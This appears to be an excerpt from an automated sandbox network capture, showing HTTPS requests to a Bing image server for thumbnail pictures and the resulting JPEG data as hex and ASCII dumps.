                                                                                                                                                                                                                                                                  2024-12-19 12:44:17 UTC16067INData Raw: ec bc 0f ae 9d 43 4b 92 c5 27 d4 19 97 cb ca 36 d2 d0 6c 6c 6e 29 9f 9f 6e 3f 42 6b 3c 4d 19 4f 15 cd 38 ed b3 f2 d3 fc dd af be 86 35 35 9a d3 55 f7 74 fe bc ce 87 5f f0 f7 85 f5 78 34 ff 00 ec bd 66 5b 3d 76 e6 ca 7b 9d 97 40 32 dc bc 67 72 94 91 b0 0a 9f 99 54 fd e6 20 d7 17 e0 ef 0c 4f e2 2f 16 59 e8 d3 df 4b a5 ad d3 18 da 59 ec 5d a4 87 3c 92 cb c7 cb 8e fc 72 6a 29 2f 74 e9 a4 b5 b1 d4 b3 17 99 67 e4 99 5a 42 61 83 68 cc 0b 1f 75 da 41 e9 d7 3e d5 25 86 ad e3 1f 15 ea 8c 23 d4 e7 d4 75 0b c5 8a c0 1b 89 46 f9 3c a0 5d 10 13 8f 95 42 e7 f0 1e b5 14 70 f5 e9 d2 92 55 3a 6e ed a7 a6 9f 9f eb a5 27 28 ae fe a5 df 18 78 05 f4 69 56 5d 37 c4 7a 57 8a 74 d8 ee 04 52 dc e9 26 49 25 8a 3d bb bf 79 6f 8d c8 31 9e 32 72 47 51 5f 55 78 0f e1 77 c2 74 f0 4d a6
                                                                                                                                                                                                                                                                  Data Ascii: CK'6lln)n?Bk<MO855Ut_x4f[=v{@2grT O/YKY]<rj)/tgZBahuA>%#uF<]BpU:n'(xiV]7zWtR&I%=yo12rGQ_UxwtM
                                                                                                                                                                                                                                                                  2024-12-19 12:44:17 UTC16384INData Raw: de b4 86 c6 f2 4b 70 d2 b0 9b 33 96 ff 00 5d 18 63 95 28 8f b0 af 46 20 1e d5 18 a8 ca 78 85 2a 95 39 9a 69 5e ca ee eb cb 4d df af cb 45 c7 52 3c ae cc d6 f0 17 8d 9e ce df ec 9a 66 8b 71 26 c6 94 dd 47 7b 0b ac a9 6e 41 61 b3 1f 29 02 46 41 93 f2 95 38 18 c6 2b aa b1 f0 d7 8b 75 eb 78 df 40 ba d2 74 eb 8b 29 a3 96 ce 59 10 82 27 d9 ca 32 80 0a 00 18 82 39 2c a4 75 ae 7a ff 00 5b d5 bc 39 3c 0e 89 16 a1 f6 15 8e de d1 a3 b9 2f 25 92 1e 30 d2 81 b5 90 97 c3 28 52 11 94 76 e6 ad de 7d a6 ef 42 d6 bc 49 75 aa ea ba 6d f6 6d 60 b4 b8 57 33 0b ab 94 c3 4f 2a b0 c7 cd 14 38 f4 52 aa 0f 15 9b a3 1f 68 a4 95 9b f9 fa fa ef d8 e7 b5 9e 86 df 8d 7c 0f 6d 7b 62 d6 8f aa 5c 68 fa 94 30 18 34 dd 42 c6 e3 08 55 c8 33 a3 9f bc 17 71 6c 37 6e 9d e9 9a 7e 83 af 68 9e 1c
                                                                                                                                                                                                                                                                  Data Ascii: Kp3]c(F x*9i^MER<fq&G{nAa)FA8+ux@t)Y'29,uz[9</%0(Rv}BIumm`W3O*8Rh|m{b\h04BU3ql7n~h
                                                                                                                                                                                                                                                                  2024-12-19 12:44:17 UTC16384INData Raw: 5d 4b 68 d9 63 fb 2b 52 d5 b4 c8 bc 41 a0 f8 1f 4b d0 6f ee 1c 9b fb 6b 77 fb 21 8d b2 58 cb 29 20 86 8c ae 01 55 dc c0 8e 83 38 ab be 13 87 c4 3a 37 c2 fd 42 4b dd 01 f5 d9 13 75 d5 bc 1a 5c a9 35 9f 92 bc 84 59 41 0c 31 f3 12 bb 78 1c 75 aa 7e 15 d2 b4 2b 8d 60 78 92 ff 00 51 d6 be d8 61 50 cb 7b 34 93 5b b1 1f 75 7c c8 d8 42 73 83 96 e0 83 8a e8 f5 44 d3 2c ae a4 d5 27 9f 5a d3 ad e0 89 1a 28 6e 19 5a cc a3 03 fe ac 82 0b 06 38 cf 24 03 f5 af 03 19 8a f6 8d d3 69 35 7b ec d3 f4 4f 99 fa 5d 5b 4f 31 ae 5d ce 5f c1 3e 21 3a c6 8d 27 89 34 bf 0f 47 a5 43 94 6b 6b 73 0c d3 4d a6 48 8d 96 28 e7 0a 77 f0 76 72 a4 37 af 15 d6 6a de 3e d6 6c 3c 2f 73 aa c5 e0 ed 4b 5e 81 ac 5a 66 86 de cd 1a e1 1c 12 1e 39 22 62 72 80 7d d6 19 fb dd 38 ae 76 f3 c7 3e 31 d2 7c
                                                                                                                                                                                                                                                                  Data Ascii: ]Khc+RAKokw!X) U8:7BKu\5YA1xu~+`xQaP{4[u|BsD,'Z(nZ8$i5{O][O1]_>!:'4GCkksMH(wvr7j>l</sK^Zf9"br}8v>1|


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  5192.168.2.649726150.171.27.10443
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-19 12:44:16 UTC346OUTGET /th?id=OADD2.10239381963595_1GOKBHWMF64DQK79Y&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                                                                                                                  Host: tse1.mm.bing.net
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  2024-12-19 12:44:16 UTC854INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                  Content-Length: 619058
                                                                                                                                                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Access-Control-Allow-Headers: *
                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                  Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                                                                                                                                                                                                                                  NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                  X-MSEdge-Ref: Ref A: 8C71BFFDD5C44133975CA3A4E99FE963 Ref B: EWR30EDGE0715 Ref C: 2024-12-19T12:44:16Z
                                                                                                                                                                                                                                                                  Date: Thu, 19 Dec 2024 12:44:15 GMT
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-12-19 12:44:16 UTC15530INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 19 82 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 d2 00 60 00 00 00 01 00 00 00 60 00 00 00 01 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 35 2e 32 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 33 3a 31 32 3a 32 39 20 31 35 3a 31 37 3a 34 39 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 04 38 a0 03 00 04 00 00 00 01 00 00 07 80 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01
                                                                                                                                                                                                                                                                  Data Ascii: JFIF``ExifMM*bj(1r2i``Adobe Photoshop 25.2 (Windows)2023:12:29 15:17:498
                                                                                                                                                                                                                                                                  2024-12-19 12:44:16 UTC16384INData Raw: 0b cd 24 6b 4b cd 3a 93 76 00 da 69 9b 29 f4 ed b4 b9 8a 22 d9 46 ca 96 45 a6 d3 4e e2 b1 0d 14 f9 29 79 a6 22 3d b4 da 76 da 2a 89 0a 29 fb 29 95 23 b0 25 14 6d a3 6d 02 40 f4 da 76 da 28 40 36 8a 28 aa 00 a2 9d 1a d3 76 d2 b8 05 14 6d a7 6d a6 08 6d 4b 1d 33 6d 49 cd 48 d0 ea 66 fa 5e 6a 37 a4 95 8a 64 9c d1 cd 47 52 73 4c 41 cd 1c d3 a9 bc d0 01 cd 1c d3 a8 a0 03 69 a7 51 4d a8 6e e5 0e a6 d3 a8 a4 03 68 a2 8a b4 ee 48 de 69 d4 51 4c 02 8a 28 a0 0a b4 53 a9 b5 46 21 45 14 50 01 4c d9 4f a2 80 0a 66 ca 96 9b b4 d0 03 36 52 f3 4e da 68 a0 06 f3 47 34 ea 28 15 88 64 5a 2a 6a 6f 34 ee 32 3a 7e ca 36 52 f3 45 c0 8e 8a 7f df a3 65 17 01 9b 68 4a 93 9a 39 a6 04 74 53 f6 52 f3 4a e0 47 42 54 9c d2 6c a6 03 28 a9 39 a4 d9 4a e0 33 6d 1b 69 fb 29 79 a2 e0 26 ca
                                                                                                                                                                                                                                                                  Data Ascii: $kK:vi)"FEN)y"=v*))#%mm@v(@6(vmmmK3mIHf^j7dGRsLAiQMnhHiQL(SF!EPLOf6RNhG4(dZ*jo42:~6REehJ9tSRJGBTl(9J3mi)y&
                                                                                                                                                                                                                                                                  2024-12-19 12:44:16 UTC16384INData Raw: 4b fd b3 ec ff 00 bb 7a f0 1d 2b 4f 93 c6 1f 11 ec 5d 34 79 75 ab 5b 69 3f d2 7c df f5 31 ee fe f3 d7 d1 e5 39 ad 65 2a 92 ae fd d4 af e9 e4 8f 13 36 ca 28 72 53 85 25 69 37 6f 5f 53 9f f8 65 ab c7 63 0c 73 bd 9f ee e3 ff 00 96 95 ed d1 eb 3a 95 c6 9f 1a 69 96 73 79 f7 9f bc fb 44 91 7e e6 05 fe fd 58 d0 fe 1a 78 3e d3 cb ff 00 43 fd dc 7f eb 23 f3 5f f7 8f 5b 7e 22 b9 d2 74 5f 0f c9 a8 bc d0 d9 58 db c7 ff 00 2d 7f f1 da f1 73 0c 45 0c 55 54 e9 2b b6 7a d9 76 0b 11 86 a6 d5 49 25 a1 89 63 6d e4 79 90 69 d3 7e fe 3f f5 97 37 32 ff 00 e8 5f 5a 87 58 d4 1f 4a b5 92 ea ea 6b 48 fc bb 67 92 3f 36 5d 9f 68 97 fb ab 57 6e 96 4b 8f 2e ca d7 c9 8e d6 3f de 7d a7 c9 de fb da a2 f1 e6 95 a6 eb 73 47 75 75 a6 f9 90 5b ec 8e 4f de fc 96 ff 00 fe d5 73 e1 68 e1 ea 4a
                                                                                                                                                                                                                                                                  Data Ascii: Kz+O]4yu[i?|19e*6(rS%i7o_Secs:isyD~Xx>C#_[~"t_X-sEUT+zvI%cmyi~?72_ZXJkHg?6]hWnK.?}sGuu[OshJ
                                                                                                                                                                                                                                                                  2024-12-19 12:44:16 UTC16384INData Raw: ff 00 de dd fc 39 aa f3 6a 16 97 1a de 9b a8 78 6e 6f b3 c1 25 ea 7e f2 5f 91 e3 fe 2f 2f fd aa f4 6f 88 4b a3 5d fd 87 c3 d7 ba 94 56 7f 68 ff 00 48 8f cc ff 00 96 8c 9f c3 5e 45 e2 3f 2f 4d f1 35 b5 ea 7e ef 4d b2 b9 4f f9 6a 9b e4 89 be 55 7f c6 b5 c1 c6 8d 7a 5e f2 6a 7a fc d7 4f 5f 53 2c 47 b5 a3 52 d1 b3 8e 97 f2 6b b7 63 db bc 4c d6 ff 00 d9 d1 ea 0f 34 b1 c1 6d 23 cf f6 9f e0 dd 5e 3d e1 bd 23 4c 97 c6 31 dd 6a 93 45 7b 04 92 79 96 52 5c fc 9f 36 cf de af e2 3a 56 f6 b9 af 6e d3 ed b4 f7 bc 86 48 3c c7 9e 38 e2 ff 00 96 75 e7 3e 34 d6 bf b3 ee fc 88 3f e5 a5 b4 d2 79 9f c1 fc 15 eb e5 79 35 57 83 97 34 9c 5b e9 e5 df b9 e7 66 59 9c 23 8a 5e ed d2 fe ac 5c f1 6e 8b 3c be 5e bc fa 0c d6 76 3e 67 97 fe b7 e7 8e 28 ff 00 77 b6 b3 3c 0f a1 db ea ba b5
                                                                                                                                                                                                                                                                  Data Ascii: 9jxno%~_//oK]VhH^E?/M5~MOjUz^jzO_S,GRkcL4m#^=#L1jE{yR\6:VnH<8u>4?yy5W4[fY#^\n<^v>g(w<
                                                                                                                                                                                                                                                                  2024-12-19 12:44:16 UTC16384INData Raw: 6e ae 24 df 7b e5 ff 00 cf 53 f7 ab 6b 5c 6f b1 69 f2 3c 13 7e f3 fd 5f fb 15 63 c6 1a d6 9b e1 cd 3e 4d 52 ea 1f 32 eb cc f2 e3 8e 28 be 7d ed 5c ae ab af 5a 4b e1 9d 25 f5 7b 3d 42 ce fa 3b 94 bb 8e da e6 2d 9e 63 7c ff 00 7f fd 9a f9 29 56 ab 5e f5 1d ed 27 ab b7 5f 43 ea 23 1a 38 68 aa 31 69 34 b4 5e 85 c8 6d a7 d6 3c 79 a4 e8 89 fe 8f 6b a0 db 25 fd cf fb ef f7 12 ba df 11 6a b2 3f 89 b4 5b 5d 22 6f 32 d7 e7 8e f6 48 bf d9 4d ca b5 8d e0 4b 9f b4 4b ab 5e c1 e7 48 f7 92 43 1c 92 49 fd cf bd be b6 7c 39 67 02 f8 83 fb 43 c9 ff 00 57 be 38 e4 ac 71 58 e7 52 50 a4 96 89 25 af 7e a3 a1 87 e5 52 a9 d5 bf f8 63 9c f8 c1 f0 92 cf e2 8e ad 26 a7 aa 4d fb bb 3b 34 83 49 8e db e4 48 d7 67 fa c9 3f e0 55 e7 5e 24 9f 49 f0 17 c2 28 f4 1b 1f b2 c9 a8 de 4a 91 dc
                                                                                                                                                                                                                                                                  Data Ascii: n${Sk\oi<~_c>MR2(}\ZK%{=B;-c|)V^'_C#8h1i4^m<yk%j?[]"o2HMKK^HCI|9gCW8qXRP%~Rc&M;4IHg?U^$I(J
                                                                                                                                                                                                                                                                  2024-12-19 12:44:16 UTC16384INData Raw: a5 fb 24 32 3f 93 ff 00 2d 3c ca e2 e4 f1 02 6b 17 72 4f 65 0c d7 1e 5c 9e 44 92 47 f7 3f e0 35 c9 ed 25 29 df b6 e7 a2 dc 12 f7 9e e4 3e 26 d5 ec 34 db 38 e7 ba 86 59 24 93 f7 71 f9 5f ed 54 9e 07 9f ed 1a 1c 7a 8e 7e cf 04 9b ff 00 77 fe eb fd ea c1 f1 c2 c1 a7 e8 91 da a4 33 49 1c 7b ff 00 df dd 5a 9e 16 fb 5f fc 21 fa 6a 3c 3f bf 92 c9 24 93 cc ff 00 73 e5 ad 5c 22 a8 7b 4e b7 dd b3 9d c9 ca b3 83 ec 74 97 d7 d0 7f 67 c7 65 e4 fe ee 4f dd c9 73 fe c5 67 e8 9a 0c 77 10 c8 ef 2f 99 6b fe b2 38 ea 6d 72 ce 4b 7d 3e 24 9e 18 7f d2 2d bf ef dd 73 f0 f8 8f ec fa e7 f6 45 94 33 7e ee 44 8e 38 e2 ff 00 66 b2 94 27 55 bb 74 1c aa 2a 69 73 31 7c 69 a5 3d ee b5 a7 59 43 37 99 fb cf de 7f bd 5e 45 fb 50 47 06 99 0d bf 86 e1 ff 00 8f ab 8d 92 49 ff 00 4c e2 5f fe
                                                                                                                                                                                                                                                                  Data Ascii: $2?-<krOe\DG?5%)>&48Y$q_Tz~w3I{Z_!j<?$s\"{NtgeOsgw/k8mrK}>$-sE3~D8f'Ut*is1|i=YC7^EPGIL_
                                                                                                                                                                                                                                                                  2024-12-19 12:44:16 UTC16384INData Raw: 9f b2 da d9 c5 23 c9 27 99 e5 c7 17 fa c7 ac 4f 0e 5b 47 6f fd 89 34 d6 9f e9 52 48 9e 67 99 ff 00 2c 1f f8 52 bd 1b c4 d0 5f af c4 1f 2f 4b f2 ad f4 eb 7b 24 fe d1 92 48 b7 a7 cd f7 3c af f6 eb 94 d5 7e cb a2 78 b2 38 6f 75 2b 4b 89 ee 2e 7c cf b3 7f cf 06 d9 5b 61 6a de 8f b2 4a ed ae 6d f5 f4 db 42 b1 14 5f b4 e7 bd 92 d3 6b 7e 27 d0 76 ef 79 a8 69 f6 57 50 ea 31 7f c7 bf ef 23 92 2f f9 6b fe f5 78 af 84 7c 27 e2 fd 0b e3 c5 ce af ab fd 96 e6 d7 59 8e 6f b4 c7 1c bf c6 bf 3a 35 7a 2d d7 89 2d 3f b4 23 9a cb ce bd 9e 4b 7f 32 da 3b 68 be 49 3e 4f bb 59 3e 1d 9e ff 00 5a f1 b5 be af ad 7f c4 ae 0b 3b 77 78 ec bc af 9e 49 76 3e ef 9a b8 a9 62 2a 7b 29 41 5a ce 36 77 15 5a 34 f9 a3 36 de 8d 35 6d 0c 6f 13 5e 5a 78 77 50 93 50 92 1b ab 89 e4 b9 fd dd b7 9b
                                                                                                                                                                                                                                                                  Data Ascii: #'O[Go4RHg,R_/K{$H<~x8ou+K.|[ajJmB_k~'vyiWP1#/kx|'Yo:5z--?#K2;hI>OY>Z;wxIv>b*{)AZ6wZ465mo^ZxwPP
                                                                                                                                                                                                                                                                  2024-12-19 12:44:17 UTC16067INData Raw: 21 2f 26 92 ea e2 4f 32 4f ef c9 fd ea 6c d0 5a 5c 68 7f da 93 ff 00 a3 ff 00 67 5c cd 77 1d b7 95 fe b3 fb b5 9d a1 c5 3d bf 82 6d 9e ea f2 5b 89 e4 b9 78 ee 64 fe 3f 9f fa 2d 6f 29 c6 50 e6 be b7 b5 bf e0 98 ea a5 6e 87 59 f0 eb 57 f3 6e e5 f0 f4 ff 00 eb a3 ff 00 57 ff 00 4d 3f bd b6 ba 69 bc cb 78 64 78 e1 fd ff 00 fa c9 3f bf fe ed 79 6f 81 62 fb 45 e4 9a bd 94 53 59 c7 1f fa b9 24 fb ff 00 35 26 a5 79 22 7c 48 93 48 d5 35 2b b8 e4 f9 2e 3c cf 9f f7 95 a5 38 aa 93 f6 77 d5 2d 7e 46 73 aa e1 0e 7b 7a 1d e7 86 74 69 35 2b bb e9 e4 9a 6f 22 39 3c b8 fc df f9 68 d5 43 52 8a 3b 7b b9 20 9e 1f 32 48 ff 00 79 24 94 e8 75 5b bb 48 7e d5 6b e4 f9 1f f4 d6 5f e3 ab b6 3a 44 f2 e8 72 7d aa 6f 33 ed 11 f9 9e 64 bf f2 ce b9 66 a3 4d da d7 f5 3a 61 2e 75 71 9e 1f
                                                                                                                                                                                                                                                                  Data Ascii: !/&O2OlZ\hg\w=m[xd?-o)PnYWnWM?ixdx?yobESY$5&y"|HH5+.<8w-~Fs{zti5+o"9<hCR;{ 2Hy$u[H~k_:Dr}o3dfM:a.uq
                                                                                                                                                                                                                                                                  2024-12-19 12:44:17 UTC16384INData Raw: 65 6c 64 39 9c 92 83 48 b3 f0 9d 64 d3 2d 7c 9b ab 3f df dc 7f ab f3 22 fe 1a e9 b5 8b 99 12 68 dd ff 00 78 f1 ff 00 cf 38 b6 79 7b ab ce ae 3c 65 24 be 65 d3 dd cb 1c e9 27 11 f9 55 6e 1f 1b 59 cf a4 cb 35 db 99 2f 9a 3f 2d 3c c1 fe af fd da e8 c4 65 f8 8a 95 7d b3 8e af 7b 1c b4 b1 f8 78 53 f6 2a 5b 13 78 a3 55 b4 97 5c d3 be d5 a7 fd a2 1f 33 f7 96 ff 00 73 ee d5 0f 15 35 fd dd df db 9e 68 ad d2 4f f5 71 c7 ff 00 2c ff 00 d9 aa 5f 69 d6 75 3f 2f ce f2 a3 48 ff 00 e5 e2 4f f6 6a 8e a5 aa 46 ba 77 f6 62 19 6e 3f 79 fe b2 5a f5 28 e1 79 39 14 56 ab 7e a7 05 4c 42 f7 9c 9b b3 d4 d3 f0 e2 7f a2 dc 5d 3e a5 15 bf 97 ff 00 91 2b 1f 51 9d 2f 6e b7 cd a8 cd 27 bc 95 42 df fb bf bd fd e7 fc f3 a6 5a 94 b7 ba dd 3c 5f 85 76 c6 82 8c 9c ef af c8 e3 96 21 ca 11 8d
                                                                                                                                                                                                                                                                  Data Ascii: eld9Hd-|?"hx8y{<e$e'UnY5/?-<e}{xS*[xU\3s5hOq,_iu?/HOjFwbn?yZ(y9V~LB]>+Q/n'BZ<_v!
                                                                                                                                                                                                                                                                  2024-12-19 12:44:17 UTC16384INData Raw: cd 19 ee 52 5f fe 39 54 75 1b 99 3f d4 a7 ef 13 cb aa 57 53 c8 d2 c9 0a 4d f2 53 b6 ba 45 f3 ff 00 cb 4a f3 e1 45 45 26 76 ca a3 91 16 8f 14 fe 6c 7f ba ff 00 59 ff 00 4d 6b 4a f9 be c5 15 c5 cc 3f bb 7f 2f fd 64 9f de a8 91 7c a8 a3 74 ac 6f 88 de 21 4d 2b c3 d2 3f 93 34 93 dc 7f c7 b7 97 5b 53 84 f1 15 e3 18 ad c9 94 a1 46 93 6d ec 6f 78 1f 5e 83 57 b4 ff 00 9e 77 56 f2 79 77 b1 ff 00 71 ab 52 79 7e d1 6b 22 7e eb fd 5d 78 a7 ec f3 af 6d d5 af 92 f6 6f f4 ed 56 e1 df cb ff 00 a6 4b 5e af 04 f2 79 df 3f df aa cd 72 ef aa 62 e5 14 b4 d2 df d7 a9 9e 07 17 f5 9c 3a 9d cd 4f 0c db 48 9f e8 af 37 98 91 d6 c5 d4 48 b2 6c ff 00 9e 75 93 a5 de c6 9f 3f fb f5 1c 9a cc 72 f9 6e 92 fc 97 1f ea eb c8 9d 3a 95 24 dd 8e c8 fb ad 2b 8e ba b4 82 2f 33 ce 87 cc fe 3a af
                                                                                                                                                                                                                                                                  Data Ascii: R_9Tu?WSMSEJEE&vlYMkJ?/d|to!M+?4[SFmox^WwVywqRy~k"~]xmoVK^y?rb:OH7Hlu?rn:$+/3:


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  6192.168.2.649735150.171.27.10443
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-19 12:44:18 UTC375OUTGET /th?id=OADD2.10239340418567_1CP2YH6ACBDMHMMFR&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                                                                                                                  Host: tse1.mm.bing.net
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  2024-12-19 12:44:19 UTC854INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                  Content-Length: 700191
                                                                                                                                                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Access-Control-Allow-Headers: *
                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                  Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                                                                                                                                                                                                                                  NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                  X-MSEdge-Ref: Ref A: 3AD7327AC33D4D6094824320C5B695F7 Ref B: EWR30EDGE1422 Ref C: 2024-12-19T12:44:18Z
                                                                                                                                                                                                                                                                  Date: Thu, 19 Dec 2024 12:44:17 GMT
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-12-19 12:44:19 UTC15530INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 17 6a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 d2 00 60 00 00 00 01 00 00 00 60 00 00 00 01 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 34 2e 31 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 33 3a 30 32 3a 31 30 20 32 33 3a 35 32 3a 33 30 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 07 80 a0 03 00 04 00 00 00 01 00 00 04 38 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01
                                                                                                                                                                                                                                                                  Data Ascii: JFIF``jExifMM*bj(1r2i``Adobe Photoshop 24.1 (Windows)2023:02:10 23:52:308
                                                                                                                                                                                                                                                                  2024-12-19 12:44:19 UTC16384INData Raw: 73 6b 27 f7 6b 4b 49 76 f3 37 57 2c d5 ce a8 cb 53 b8 d3 4e e8 29 64 f9 64 aa 7a 3c 9f bb ab bb d5 ab 8d ee 76 c7 63 3f 54 89 5f e6 ac 3b cb 7d b2 7c d5 d1 5e 15 f9 eb 27 5c f9 60 f3 2b 6a 72 30 a8 91 c5 f8 82 25 5f bb 59 b6 b1 6d 93 75 6e 6b db 5b e6 ac 78 64 fd e5 75 c7 63 8e 51 d4 d8 d2 64 55 f9 6b 7e cf f7 91 d7 2b 66 fb a4 f9 6b a9 d3 4f ee fe 6a c6 a1 bd 22 c2 c1 52 32 6c 8e 9d 0d 57 d6 25 f2 a0 76 6a c4 d5 e8 67 6b 97 8b e5 ed ae 2b 5e 91 5a 4f 96 af 6b 57 6c f2 3f ef 2b 0f 50 93 74 7f 35 76 d1 85 8e 1a d3 b9 9f 31 fd e5 4d 6e f5 4e e1 dd a4 a9 6d de ba de c7 1c 5e a6 dd 9b ee ae 93 45 89 9e b9 9d 24 6f 91 2b bc f0 bd be e8 f7 57 25 59 58 ec a2 ae 47 71 13 7d da 19 36 41 5b 4d 65 fc 4d 59 7a c6 d8 3e 55 ac 63 2b 9d 0e 36 45 39 b6 f9 15 4f 62 b5 0d
                                                                                                                                                                                                                                                                  Data Ascii: sk'kKIv7W,SN)ddz<vc?T_;}|^'\`+jr0%_Ymunk[xducQdUk~+fkOj"R2lW%vjgk+^ZOkWl?+Pt5v1MnNm^E$o+W%YXGq}6A[MeMYz>Uc+6E9Ob
                                                                                                                                                                                                                                                                  2024-12-19 12:44:19 UTC16384INData Raw: 19 b4 2b 39 e3 dd 6b 27 cd fd ca a4 b6 f7 9a 6c 9f 2c 92 6d ac 9a 4f 63 45 26 b7 35 b5 4d 06 2f 9e 48 e3 75 6f f6 2a 9d bc fa ad 97 cb 1d c4 8c ab fc 0f 57 34 df 11 b2 fc b7 1f 32 d6 f5 9f d8 f5 18 f7 79 11 ff 00 c0 2b 39 36 b7 34 8a be db 98 31 eb 77 8f 1f ef 23 f9 bf d8 a9 a3 d6 19 7e 59 2b 62 e3 40 b6 6f 9a 39 36 ff 00 b1 59 f7 da 43 45 1f cd 24 6d fe fd 4d e2 ca f7 d7 52 dd 9e a3 be 3d d1 c9 1b 2f fe 3d 44 da c2 ae f5 93 ff 00 1f ae 6e e2 da 58 a7 fd cf ca d4 9f da 17 d1 47 b6 ea 0f 35 7f bf 47 b3 17 b5 36 e3 d5 20 f3 bf d5 ed ad 6d 3e f2 da 58 fe 6f 96 b8 f8 6e 2c 65 93 6f 97 b6 b5 6c 63 b6 f2 f7 47 25 29 47 41 c6 a1 d3 dd 68 9a 7e a3 06 e5 f2 d6 4f ef a5 60 de 78 62 f2 d6 4d cb 04 77 11 ff 00 b1 53 c3 2b db fc cb 26 da d0 b5 d7 e5 83 fd 67 cc b5 9f
                                                                                                                                                                                                                                                                  Data Ascii: +9k'l,mOcE&5M/Huo*W42y+9641w#~Y+b@o96YCE$mMR=/=DnXG5G6 m>Xon,eolcG%)GAh~O`xbMwS+&g
